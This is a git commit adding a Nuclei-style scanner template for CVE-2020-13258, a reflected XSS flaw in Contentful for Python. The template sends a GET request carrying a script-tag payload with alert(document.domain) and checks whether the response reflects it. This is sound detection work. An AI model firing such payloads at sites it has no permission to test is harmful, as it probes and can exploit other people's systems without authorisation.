Create CVE-2020-13258.yaml
parent
43f1a6fc4f
commit
c3360c9d23
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2020-13258
|
||||
|
||||
info:
|
||||
name: Contentful reflected XSS
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Contentful through 2020-05-21 for Python allows reflected XSS.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13258
|
||||
tags: cve,cve2020,contentful,xss
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?cda'"<evil><script>alert(document.domain)</script>&locale=locale=de-DE'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<evil><script>alert(document.domain)</script>"
|
||||
condition: and
|
Loading…
Reference in New Issue